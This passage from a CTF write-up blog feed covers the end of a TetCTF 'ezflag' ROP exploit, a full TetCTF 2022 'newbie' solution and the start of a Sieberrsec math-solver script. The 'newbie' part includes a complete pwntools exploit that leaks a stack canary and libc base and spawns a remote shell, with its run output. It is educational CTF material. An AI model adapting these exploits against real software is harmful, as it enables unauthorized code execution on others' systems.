class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">'Exploit complete. Please check /tmp/flag2.'</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>We can run the exploit and grab the world-readable flag.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span> /tmp/flag2 <span class="go">ls: cannot access '/tmp/flag2': No such file or directory </span><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[*] '/vagrant/tetctf/ezflag1/auth' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [*] Loaded 120 cached gadgets for './auth' [*] Constructed ROP payload to fix stack: </span><span class="gp"> 0x0000: 0x413883 add rsp, 0x38;</span><span class="w"> </span>pop rbx<span class="p">;</span> pop rbp<span class="p">;</span> ret <span class="go">[*] Length of ROP fix stack payload: 0x8 [*] Constructed ROP payload: </span><span class="gp"> 0x0000: 0x4497a7 pop rax;</span><span class="w"> </span>ret <span class="go"> 0x0008: 0x3b SYS_execve </span><span class="gp"> 0x0010: 0x40f67e pop rsi;</span><span class="w"> </span>ret <span class="go"> 0x0018: 0x0 </span><span class="gp"> 0x0020: 0x40176f pop rdx;</span><span class="w"> </span>ret <span class="go"> 0x0028: 0x0 0x0030: 0x4012d3 syscall [*] Length of ROP payload: 0x38 [+] Opening connection to localhost on port 4444: Done [*] Canary: 0x9a5b80ff18293100 [*] Closed connection to localhost port 4444 [+] Opening connection to localhost on port 4444: Done [*] Length of payload: 0x100 [+] Exploit complete. Please check /tmp/flag2. [*] Closed connection to localhost port 4444 </span><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> /tmp/flag2 <span class="go">TetCTF{Fake_Flag_Because_Service_Is_Down} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">Sadly, didn't solve it during the competition.</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: In this two part challenge, flawed filename logic allows an attacker to write arbitrary Python files that are executed as a CGI script. Once the attacker obtains a shell on the system, they can exploit a straightforward buffer overflow in a forking statically compiled binary that authenticates basic authentication login attempts. Since the binary forks per connection, the stack canary can be leaked in one connection, and a ROP chain can be sent in the second with the fixed canary. Additionally, to simplify exploitation and avoid messing with file descriptor duping, a shell script can be created on the filesystem beforehand to be executed with the ROP chain to run our arbitrary commands.

2022-01-03T00:00:00+08:002022-01-03T00:00:00+08:00https://nandynarwhals.org/tetctf-2022-newbie<p>Summary: An ELF binary contains functionality to generate a ‘hashed’ identifier from two bytes of memory at an offset specified by the user. This ‘hashed’ identifier is generated by taking the two bytes as the seed to srand and running rand 32 times and using the result as the lookup value to a table. Precomputing these identifiers allows us to leak the stack canary and libc base address. These can then be used in a straightforward buffer overflow to obtain a shell.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 65 Solves NewBie 100 Points Service: nc 18.220.157.154 31337 or Service: nc 3.22.71.49 31337 Binary Author: @chung96vn </code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/tetctf-2022/newbie_a28e90077643a7ef3b2385863a23cbf9.tar.gz">challenge file</a></p> <h2 id="solution">Solution</h2> <p>The provided tar.gz file contains the binary and server-side libc.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">tar </span>xvf newbie_a28e90077643a7ef3b2385863a23cbf9.tar.gz <span class="go">newbie libc-2.27.so </span></code></pre></div></div> <p>The main function is simple, calling a setup function, printing a banner, then calling another function with the meat of the logic.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-1.png" alt="Main function disassembly" class="align-center" /></p> <p>This meaty function basically does the following things:</p> <ol> <li>Opens <code class="language-plaintext highlighter-rouge">/dev/urandom</code>, reads 10 bytes into a buffer.</li> <li>Goes into a while loop that reads 0x100 bytes from the user and checks if they match the following commands: <ul> <li><code class="language-plaintext highlighter-rouge">id &lt;value&gt;</code> - If the first three bytes of the user input matches <code class="language-plaintext highlighter-rouge">"id "</code>, then the argument that follows is parsed using <code class="language-plaintext highlighter-rouge">atoi</code> and then stored.</li> <li><code class="language-plaintext highlighter-rouge">create</code> - Dereferences two bytes using the offset specified in the previous <code class="language-plaintext highlighter-rouge">id</code> call and passes it to a function.</li> <li><code class="language-plaintext highlighter-rouge">quit</code> - Breaks out of the loop.</li> </ul> </li> </ol> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-2.png" alt="Meaty function disassembly" class="align-center" /></p> <p>Something to notice is that the function looks like it may be vulnerable to buffer overflow if we send a large amount of data then quit. This is confirmed with a simple test that also makes it obvious we need to leak the stack canary.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>./newbie <span class="go">SECRET KEY GENERATOR </span><span class="gp">&gt;</span><span class="w"> </span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <span class="go">Incorrect Syntax </span><span class="gp">&gt;</span><span class="w"> </span>quit <span class="go">*** stack smashing detected ***: ./newbie terminated Aborted (core dumped) </span></code></pre></div></div> <p>If we dive into the <code class="language-plaintext highlighter-rouge">create</code> function, we can see that it uses the input as the argument to <code class="language-plaintext highlighter-rouge">srand</code>, then a string of length 32 is created from a character set by calling <code class="language-plaintext highlighter-rouge">rand() % length of charset</code>. This is then printed to the user.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-3.png" alt="Create function disassembly" class="align-center" /></p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>./newbie <span class="go">SECRET KEY GENERATOR </span><span class="gp">&gt;</span><span class="w"> </span><span class="nb">id </span>1 <span class="gp">&gt;</span><span class="w"> </span>create <span class="go">Your key: ZNkTtC3qwy3WxftahlGRKluMBDcUuirI </span></code></pre></div></div> <p>Note that there is no bounds checking when the <code class="language-plaintext highlighter-rouge">id</code> value is passed. We can potentially use this to leak arbitrary memory contents from an offset by precomputing all possible <code class="language-plaintext highlighter-rouge">2**16</code> ‘hashes’ and requesting for two bytes at a time.</p> <p>There are two things we want to leak:</p> <ol> <li>The stack canary.</li> <li>A libc address.</li> </ol> <p>Let’s start by debugging the binary and using <code class="language-plaintext highlighter-rouge">id 0</code> before <code class="language-plaintext highlighter-rouge">create</code> to examine the memory layout. With an offset of <code class="language-plaintext highlighter-rouge">0</code>, the two byte value looks to be <code class="language-plaintext highlighter-rouge">0x0000000000009f12</code>.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-4.png" alt="Debugging the address passed to create function" class="align-center" /></p> <p>If we look for occurences of this value, it appears in the stack at address <code class="language-plaintext highlighter-rouge">0x7fffffffe2b6</code>.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-5.png" alt="Grepping for occurrences of the value" class="align-center" /></p> <p>Examining the contents of the stack around that address gives us these values. To validate this hypothesis, we can try to look at <code class="language-plaintext highlighter-rouge">id 1</code> where we expect the value to be <code class="language-plaintext highlighter-rouge">0x0549</code>.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-6.png" alt="Examining the stack at the occurence of the value" class="align-center" /></p> <p>This is exactly what we see when we test that out.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-7.png" alt="Confirming the base address of the buffer" class="align-center" /></p> <p>Given that we know the value of the base buffer to be <code class="language-plaintext highlighter-rouge">0x7fffffffe2b6</code>, we can now look for occurrences of the stack canary on the stack to determine the required offset. Since we are looking for one after the buffer, the most likely usable one is <code class="language-plaintext highlighter-rouge">0x7fffffffe318</code>.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-8.png" alt="Finding occurences of the stack canary" class="align-center" /></p> <p>This is 98 bytes away from the buffer, hence to leak the entire stack canary, we need to probe offsets <code class="language-plaintext highlighter-rouge">49, 50, 51, 52</code>. We have our stack canary leak now.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">In [461]: 0x7fffffffe318 - 0x7fffffffe2b6 Out[461]: 98 </span></code></pre></div></div> <p>Next, we want to leak something from libc. Something we know that’s definitely on the stack is the return address back into <code class="language-plaintext highlighter-rouge">__libc_start_main</code> from the <code class="language-plaintext highlighter-rouge">main</code> function. Searching for it tells us that it is at the stack address <code class="language-plaintext highlighter-rouge">0x7fffffffe348</code>.</p> <p><img src="https://nandynarwhals.org/assets/images/tetctf-2022/newbie-9.png" alt="Looking for the saved return value into main." class="align-center" /></p> <p>Great, this is 146 bytes away from the buffer. Thus, we have to leak offsets <code class="language-plaintext highlighter-rouge">73, 74, 75, 76</code> to obtain the full value.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">In [465]: 0x7fffffffe348 - 0x7fffffffe2b6 Out[465]: 146 </span></code></pre></div></div> <p>Putting all of this together into an exploit, we have:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">one_gadget</span> <span class="kn">import</span> <span class="n">generate_one_gadget</span> <span class="kn">import</span> <span class="nn">ctypes</span> <span class="n">charset</span> <span class="o">=</span> <span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"</span> <span class="n">stack_canary_offset</span> <span class="o">=</span> <span class="mi">49</span> <span class="n">stack___libc_start_main_offset</span> <span class="o">=</span> <span class="mi">73</span> <span class="n">hashes</span> <span class="o">=</span> <span class="p">{}</span> <span class="c1"># context.log_level = 'debug' </span> <span class="k">def</span> <span class="nf">leak</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">toggle_zero</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span> <span class="s">'''Leaks 2 bytes at an offset &lt;&lt; 1. '''</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'id '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">offset</span><span class="p">).</span><span class="n">encode</span><span class="p">())</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'create'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Your key: '</span><span class="p">)</span> <span class="n">key</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="n">value</span> <span class="o">=</span> <span class="n">hashes</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="c1"># Correct for the 1 and 0 collision. </span> <span class="k">if</span> <span class="n">value</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">toggle_zero</span><span class="p">:</span> <span class="n">value</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Offset {}: {} ({})'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="nb">hex</span><span class="p">(</span><span class="n">value</span><span class="p">)))</span> <span class="k">return</span> <span class="n">value</span> <span class="k">def</span> <span class="nf">precompute</span><span class="p">():</span> <span class="s">'''Pre-compute the 'hashes' '''</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ctypes</span><span class="p">.</span><span class="n">cdll</span><span class="p">.</span><span class="n">LoadLibrary</span><span class="p">(</span><span class="s">"libc.so.6"</span><span class="p">)</span> <span class="k">global</span> <span class="n">hashes</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0xffff</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span> <span class="n">libc</span><span class="p">.</span><span class="n">srand</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="n">val</span> <span class="o">=</span> <span class="s">''</span> <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">):</span> <span class="n">val</span> <span class="o">+=</span> <span class="n">charset</span><span class="p">[</span><span class="n">libc</span><span class="p">.</span><span class="n">rand</span><span class="p">()</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">charset</span><span class="p">)]</span> <span class="n">hashes</span><span class="p">[</span><span class="n">val</span><span class="p">]</span> <span class="o">=</span> <span class="n">i</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Computed {} hashes."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">hashes</span><span class="p">)))</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">precompute</span><span class="p">()</span> <span class="c1"># Find the magic one gadget in the provided libc. </span> <span class="n">libc_path</span> <span class="o">=</span> <span class="s">'./libc-2.27.so'</span> <span class="c1"># libc_path = '/lib/x86_64-linux-gnu/libc.so.6' </span> <span class="n">magic_offset</span> <span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">generate_one_gadget</span><span class="p">(</span><span class="n">libc_path</span><span class="p">))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Found magic one gadget at offset: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">magic_offset</span><span class="p">)))</span> <span class="c1"># Get the __libc_start_main offset </span> <span class="n">libc_elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libc_path</span><span class="p">)</span> <span class="n">__libc_start_main_offset</span> <span class="o">=</span> <span class="n">libc_elf</span><span class="p">.</span><span class="n">libc_start_main_return</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'__libc_start_main_offset: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">__libc_start_main_offset</span><span class="p">)))</span> <span class="c1"># Start the program. </span> <span class="c1"># p = process("./newbie") </span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'18.191.117.63'</span><span class="p">,</span> <span class="mi">31337</span><span class="p">)</span> <span class="c1"># Leak the canary. </span> <span class="n">canary</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span> <span class="n">canary</span> <span class="o">+=</span> <span class="p">(</span><span class="n">leak</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">stack_canary_offset</span> <span class="o">+</span> <span class="n">i</span><span class="p">))</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="mi">16</span> <span class="o">*</span> <span class="n">i</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Leaked canary: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">)))</span> <span class="c1"># Leak the __libc_start_main return value. </span> <span class="n">__libc_start_main</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span> <span class="n">__libc_start_main</span> <span class="o">+=</span> <span class="p">(</span><span class="n">leak</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">stack___libc_start_main_offset</span> <span class="o">+</span> <span class="n">i</span><span class="p">))</span> <span class="o">&lt;&lt;</span> <span class="p">(</span><span class="mi">16</span> <span class="o">*</span> <span class="n">i</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Leaked __libc_start_main: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">__libc_start_main</span><span class="p">)))</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">__libc_start_main</span> <span class="o">-</span> <span class="n">__libc_start_main_offset</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'libc base address: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)))</span> <span class="n">magic</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">magic_offset</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Magic one gadget address: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">magic</span><span class="p">)))</span> <span class="c1"># Trigger the buffer overflow. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span> <span class="mi">88</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4242424242424242</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">magic</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># Quit to return. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt; '</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'quit'</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">"Shell spawned! Enjoy!"</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">vagrant@ubuntu-xenial:/vagrant/tetctf/newbie$</span><span class="w"> </span>python exploit.py <span class="go">[*] Computed 65535 hashes. [*] Found magic one gadget at offset: 0x4f432 [*] '/vagrant/tetctf/newbie/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] __libc_start_main_offset: 0x21bf7 [+] Opening connection to 18.191.117.63 on port 31337: Done [*] Offset 49: LApmeIwPVRvBimHy6V7jRifniOTe7NBG (0xc100) [*] Offset 50: henRdEDwBeIMjzAvEudyFn76uTxTBkKi (0xd80c) [*] Offset 51: 6JbEAh0e88NItAu5hKAY2wB2lSperfNn (0xf4a7) [*] Offset 52: tqfR2IdzzMKJDfptV4s3imx0OPmk5yvo (0x1ae) [*] Leaked canary: 0x1aef4a7d80cc100 [*] Offset 73: IUm4PsKcRdQCYgkI203pmyJk9KmqZ33h (0x2bf7) [*] Offset 74: rzikY2f8hfX3SsEjQPqd2yzF5Z3OdtcI (0x6d50) [*] Offset 75: gS0gzFoAuPb6O2AqmPcfd9VHdLphzi2W (0x7f14) [*] Offset 76: pkDHTxmMR18N2l9k88EmLgN7cCCTt9rW (0x0) [*] Leaked __libc_start_main: 0x7f146d502bf7 [*] libc base address: 0x7f146d4e1000 [*] Magic one gadget address: 0x7f146d530432 [+] Shell spawned! Enjoy! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span> /home/ <span class="go">total 12 drwxr-xr-x 1 root root 4096 Dec 31 13:01 . drwxr-xr-x 1 root root 4096 Dec 31 13:01 .. drwxr-xr-x 1 root newbie 4096 Dec 31 13:01 newbie </span><span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> /home/newbie <span class="gp">$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span> <span class="go">total 36 drwxr-xr-x 1 root newbie 4096 Dec 31 13:01 . drwxr-xr-x 1 root root 4096 Dec 31 13:01 .. -rw-r--r-- 1 root newbie 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 root newbie 3771 Apr 4 2018 .bashrc -rw-r--r-- 1 root newbie 807 Apr 4 2018 .profile -rw-r----- 1 root newbie 34 Dec 31 12:54 flag -rwxr-xr-x 1 root newbie 10216 Dec 31 12:54 newbie </span><span class="gp">$</span><span class="w"> </span><span class="nb">cat </span>flag <span class="go">TetCTF{Challenge_f0r_n3wbie_Akwpa} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">TetCTF{Challenge_f0r_n3wbie_Akwpa}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: An ELF binary contains functionality to generate a ‘hashed’ identifier from two bytes of memory at an offset specified by the user. This ‘hashed’ identifier is generated by taking the two bytes as the seed to srand and running rand 32 times and using the result as the lookup value to a table. Precomputing these identifiers allows us to leak the stack canary and libc base address. These can then be used in a straightforward buffer overflow to obtain a shell.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-canyoumathit<p>Summary: Typical math scripting challenge. Just providing the solution for a safeeval version to avoid insecure evaluation of untrusted inputs.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Can You Math It? Miscellaneous Solves (25) - 313 Points Can you solve 100 math equations? What if you only have 5 seconds to solve each? Server source code available here [This is a scripting challenge. You are expected to write a script to solve it.] Connect to the challenge at nc challs.sieberrsec.tech 29079 </code></pre></div></div> <h2 id="solution">Solution</h2> <p>The source code is given but is really not required. Just useful to verify that the math challenges provided aren’t too crazy.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">time</span><span class="p">,</span> <span class="n">sleep</span> <span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">randint</span><span class="p">,</span> <span class="n">choice</span> <span class="n">operations</span> <span class="o">=</span> <span class="p">(</span><span class="s">'+'</span><span class="p">,</span> <span class="s">'-'</span><span class="p">,</span> <span class="s">'*'</span><span class="p">,</span> <span class="s">'/'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">givechal</span><span class="p">():</span> <span class="c1"># generate and solve equation, return both question and answer </span> <span class="n">challenge</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">999</span><span class="p">))</span> <span class="o">+</span> <span class="s">' '</span> <span class="o">+</span> <span class="n">choice</span><span class="p">(</span><span class="n">operations</span><span class="p">)</span> <span class="o">+</span> <span class="s">' '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">999</span><span class="p">))</span> <span class="o">+</span> <span class="s">' '</span> <span class="o">+</span> <span class="n">choice</span><span class="p">(</span><span class="n">operations</span><span class="p">)</span> <span class="o">+</span> <span class="s">' '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">999</span><span class="p">))</span> <span class="n">result</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">challenge</span><span class="p">))</span> <span class="k">return</span> <span class="n">challenge</span><span class="p">,</span> <span class="n">result</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="c1"># intro </span> <span class="k">print</span><span class="p">(</span><span class="s">'Can You Math It?'</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># add some arbitrary delay </span> <span class="k">print</span><span class="p">(</span><span class="s">'You have 5 seconds to answer each question'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'You have 100 questions to solve'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Please give all answers to nearest integer'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Good luck'</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="n">challenge</span><span class="p">,</span> <span class="n">result</span> <span class="o">=</span> <span class="n">givechal</span><span class="p">()</span> <span class="c1"># generate and store question and answer </span> <span class="k">print</span><span class="p">(</span><span class="s">'Solve '</span><span class="p">,</span> <span class="n">challenge</span><span class="p">,</span> <span class="s">' :'</span><span class="p">)</span> <span class="c1"># show the question </span> <span class="n">start</span> <span class="o">=</span> <span class="n">time</span><span class="p">()</span> <span class="c1"># start a timer </span> <span class="n">answer</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span> <span class="c1"># receive answer </span> <span class="n">timetaken</span> <span class="o">=</span> <span class="n">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">start</span> <span class="c1"># stop timer, calculate time taken </span> <span class="k">if</span> <span class="n">timetaken</span> <span class="o">&lt;</span> <span class="mi">5</span> <span class="ow">and</span> <span class="n">answer</span> <span class="o">==</span> <span class="nb">str</span><span class="p">(</span><span class="n">result</span><span class="p">):</span> <span class="c1"># if within time limit and correct answer </span> <span class="k">print</span><span class="p">(</span><span class="s">'Correct!'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'Next question'</span><span class="p">)</span> <span class="k">elif</span> <span class="n">timetaken</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">:</span> <span class="c1"># if more than 5 secs taken </span> <span class="k">print</span><span class="p">(</span><span class="s">'Took longer than 5 seconds'</span><span class="p">)</span> <span class="nb">exit</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="c1"># answer wrong </span> <span class="k">print</span><span class="p">(</span><span class="s">'Wrong answer'</span><span class="p">)</span> <span class="nb">exit</span><span class="p">()</span> <span class="k">print</span><span class="p">(</span><span class="s">'Congratulations! You CAN math it'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">'The flag is IRS{FLAG_REDACTED}'</span><span class="p">)</span> <span class="c1"># the flag goes here </span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> <span class="c1"># run the program </span></code></pre></div></div> <p>Pwntools offers the <code class="language-plaintext highlighter-rouge">safeeval</code> utility to safely evaluate expressions. We can use this to solve the script without fear of shenanigans.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># context.log_level = 'debug' </span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'challs.sieberrsec.tech'</span><span class="p">,</span> <span class="mi">29079</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Solve '</span><span class="p">)</span> <span class="n">challenge</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">':'</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">strip</span><span class="p">()</span> <span class="n">solution</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">util</span><span class="p">.</span><span class="n">safeeval</span><span class="p">.</span><span class="n">expr</span><span class="p">(</span><span class="n">challenge</span><span class="p">))</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">solution</span><span class="p">).</span><span class="n">encode</span><span class="p">())</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Challenge {}: {} = {}'</span><span class="p">.</span><span 